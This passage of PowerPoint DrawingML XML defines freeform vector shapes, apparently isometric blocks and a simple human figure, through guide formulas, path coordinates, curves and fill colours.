                  <a:gd name="T9" fmla="*/ 241 h 7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99" h="708">
                    <a:moveTo>
                      <a:pt x="0" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="241"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CCFFCC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5" name="Freeform 702">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C25B88A8-5618-45A8-B173-1AEB64A8896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750" y="6353"/>
                <a:ext cx="452" cy="536"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 452"/>
                  <a:gd name="T1" fmla="*/ 0 h 536"/>
                  <a:gd name="T2" fmla="*/ 196 w 452"/>
                  <a:gd name="T3" fmla="*/ 196 h 536"/>
                  <a:gd name="T4" fmla="*/ 0 w 452"/>
                  <a:gd name="T5" fmla="*/ 144 h 536"/>
                  <a:gd name="T6" fmla="*/ 0 w 452"/>
                  <a:gd name="T7" fmla="*/ 416 h 536"/>
                  <a:gd name="T8" fmla="*/ 452 w 452"/>
                  <a:gd name="T9" fmla="*/ 536 h 536"/>
                  <a:gd name="T10" fmla="*/ 452 w 452"/>
                  <a:gd name="T11" fmla="*/ 69 h 536"/>
                  <a:gd name="T12" fmla="*/ 196 w 452"/>
                  <a:gd name="T13" fmla="*/ 0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2" h="536">
                    <a:moveTo>
                      <a:pt x="196" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="196" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="69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6" name="Freeform 703">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17709C53-8E1A-4B78-AF8F-21D36585629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554" y="6058"/>
                <a:ext cx="1155" cy="364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 707 w 1155"/>
                  <a:gd name="T1" fmla="*/ 0 h 364"/>
                  <a:gd name="T2" fmla="*/ 452 w 1155"/>
                  <a:gd name="T3" fmla="*/ 68 h 364"/>
                  <a:gd name="T4" fmla="*/ 645 w 1155"/>
                  <a:gd name="T5" fmla="*/ 123 h 364"/>
                  <a:gd name="T6" fmla="*/ 0 w 1155"/>
                  <a:gd name="T7" fmla="*/ 295 h 364"/>
                  <a:gd name="T8" fmla="*/ 256 w 1155"/>
                  <a:gd name="T9" fmla="*/ 364 h 364"/>
                  <a:gd name="T10" fmla="*/ 1155 w 1155"/>
                  <a:gd name="T11" fmla="*/ 123 h 364"/>
                  <a:gd name="T12" fmla="*/ 707 w 1155"/>
                  <a:gd name="T13" fmla="*/ 0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55" h="364">
                    <a:moveTo>
                      <a:pt x="707" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="777777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7" name="Freeform 704">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCE30424-5643-4AFC-AE76-924DDA2ABF5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1652" y="6233"/>
                <a:ext cx="454" cy="536"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 255 w 454"/>
                  <a:gd name="T1" fmla="*/ 0 h 536"/>
                  <a:gd name="T2" fmla="*/ 258 w 454"/>
                  <a:gd name="T3" fmla="*/ 196 h 536"/>
                  <a:gd name="T4" fmla="*/ 454 w 454"/>
                  <a:gd name="T5" fmla="*/ 144 h 536"/>
                  <a:gd name="T6" fmla="*/ 454 w 454"/>
                  <a:gd name="T7" fmla="*/ 415 h 536"/>
                  <a:gd name="T8" fmla="*/ 0 w 454"/>
                  <a:gd name="T9" fmla="*/ 536 h 536"/>
                  <a:gd name="T10" fmla="*/ 0 w 454"/>
                  <a:gd name="T11" fmla="*/ 68 h 536"/>
                  <a:gd name="T12" fmla="*/ 255 w 454"/>
                  <a:gd name="T13" fmla="*/ 0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4" h="536">
                    <a:moveTo>
                      <a:pt x="255" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="258" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255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8" name="Freeform 705">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{556D3ED1-A49B-4CCE-BE57-F432ADE9198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1652" y="6377"/>
                <a:ext cx="1354" cy="363"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1354 w 1354"/>
                  <a:gd name="T1" fmla="*/ 241 h 363"/>
                  <a:gd name="T2" fmla="*/ 454 w 1354"/>
                  <a:gd name="T3" fmla="*/ 0 h 363"/>
                  <a:gd name="T4" fmla="*/ 0 w 1354"/>
                  <a:gd name="T5" fmla="*/ 120 h 363"/>
                  <a:gd name="T6" fmla="*/ 902 w 1354"/>
                  <a:gd name="T7" fmla="*/ 363 h 363"/>
                  <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                  <a:gd name="T9" fmla="*/ 241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4" h="363">
                    <a:moveTo>
                      <a:pt x="1354" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1354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9" name="Freeform 706">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61407C06-660B-48A2-B9F6-C4E90317C65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1652" y="6233"/>
                <a:ext cx="1354" cy="309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1157 w 1354"/>
                  <a:gd name="T1" fmla="*/ 240 h 309"/>
                  <a:gd name="T2" fmla="*/ 1354 w 1354"/>
                  <a:gd name="T3" fmla="*/ 189 h 309"/>
                  <a:gd name="T4" fmla="*/ 1098 w 1354"/>
                  <a:gd name="T5" fmla="*/ 120 h 309"/>
                  <a:gd name="T6" fmla="*/ 900 w 1354"/>
                  <a:gd name="T7" fmla="*/ 172 h 309"/>
                  <a:gd name="T8" fmla="*/ 255 w 1354"/>
                  <a:gd name="T9" fmla="*/ 0 h 309"/>
                  <a:gd name="T10" fmla="*/ 0 w 1354"/>
                  <a:gd name="T11" fmla="*/ 68 h 309"/>
                  <a:gd name="T12" fmla="*/ 902 w 1354"/>
                  <a:gd name="T13" fmla="*/ 309 h 309"/>
                  <a:gd name="T14" fmla="*/ 1157 w 1354"/>
                  <a:gd name="T15" fmla="*/ 240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54" h="309">
                    <a:moveTo>
                      <a:pt x="1157" y="240"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1354" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1098" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="900" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1157" y="240"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="777777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0" name="Freeform 707">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BAFCD99-A928-401B-9286-91D4E2106C4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1652" y="6301"/>
                <a:ext cx="902" cy="709"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 902 w 902"/>
                  <a:gd name="T1" fmla="*/ 241 h 709"/>
                  <a:gd name="T2" fmla="*/ 900 w 902"/>
                  <a:gd name="T3" fmla="*/ 709 h 709"/>
                  <a:gd name="T4" fmla="*/ 0 w 902"/>
                  <a:gd name="T5" fmla="*/ 468 h 709"/>
                  <a:gd name="T6" fmla="*/ 0 w 902"/>
                  <a:gd name="T7" fmla="*/ 0 h 709"/>
                  <a:gd name="T8" fmla="*/ 902 w 902"/>
                  <a:gd name="T9" fmla="*/ 241 h 7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02" h="709">
                    <a:moveTo>
                      <a:pt x="902" y="241"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="900" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="241"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CCFFCC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1" name="Freeform 708">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09776CDA-165E-4A0B-85FC-1BB0A166732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-752" y="6422"/>
                <a:ext cx="454" cy="590"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 257 w 454"/>
                  <a:gd name="T1" fmla="*/ 51 h 590"/>
                  <a:gd name="T2" fmla="*/ 454 w 454"/>
                  <a:gd name="T3" fmla="*/ 0 h 590"/>
                  <a:gd name="T4" fmla="*/ 454 w 454"/>
                  <a:gd name="T5" fmla="*/ 196 h 590"/>
                  <a:gd name="T6" fmla="*/ 454 w 454"/>
                  <a:gd name="T7" fmla="*/ 467 h 590"/>
                  <a:gd name="T8" fmla="*/ 0 w 454"/>
                  <a:gd name="T9" fmla="*/ 590 h 590"/>
                  <a:gd name="T10" fmla="*/ 2 w 454"/>
                  <a:gd name="T11" fmla="*/ 120 h 590"/>
                  <a:gd name="T12" fmla="*/ 257 w 454"/>
                  <a:gd name="T13" fmla="*/ 51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4" h="590">
                    <a:moveTo>
                      <a:pt x="257" y="51"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="51"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CCFFCC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655" name="Group 709">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C60A4131-E809-485F-82C5-1FA794D41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77616" y="3527283"/>
              <a:ext cx="197029" cy="471090"/>
              <a:chOff x="3735" y="3265"/>
              <a:chExt cx="468" cy="1120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="896" name="Freeform 710">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083ED195-DCAA-4511-BAAD-A215FD1F6E3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53" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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7" name="Freeform 711">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00968379-ACF6-4A7B-AE16-3FC56854009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53" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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8" name="Freeform 712">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60FA390E-6F36-4723-8787-E96B1354D9A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5" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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9" name="Freeform 713">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A65F92-A41C-4BA9-B529-131CE445C2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5" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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0" name="Freeform 714">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06D276B-3470-478D-967C-77488FDF915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86" y="3390"/>
                <a:ext cx="156" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="9" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="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1" name="Freeform 715">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C3CD1E-07DD-4A57-911B-D1ED74A30FA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65" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39" y="1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2" name="Freeform 716">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60A49956-FA95-494D-8AE0-C853349503C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65" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39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3" name="Freeform 717">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D725220-8928-4D9F-A8A0-2D1505EB9DD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38" y="3898"/>
                <a:ext cx="24" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 12 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="9" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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4" name="Freeform 718">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F65FEE-6294-4028-8828-45715479D7F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53" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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5" name="Freeform 719">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{826404A0-AAF6-462C-B641-7AF820DC7E9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53" y="3806"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 10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5 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88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89 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:move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</a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="69A2E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6" name="Freeform 720">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA027161-9505-44CE-AB3E-E0BD01C1D95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5" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
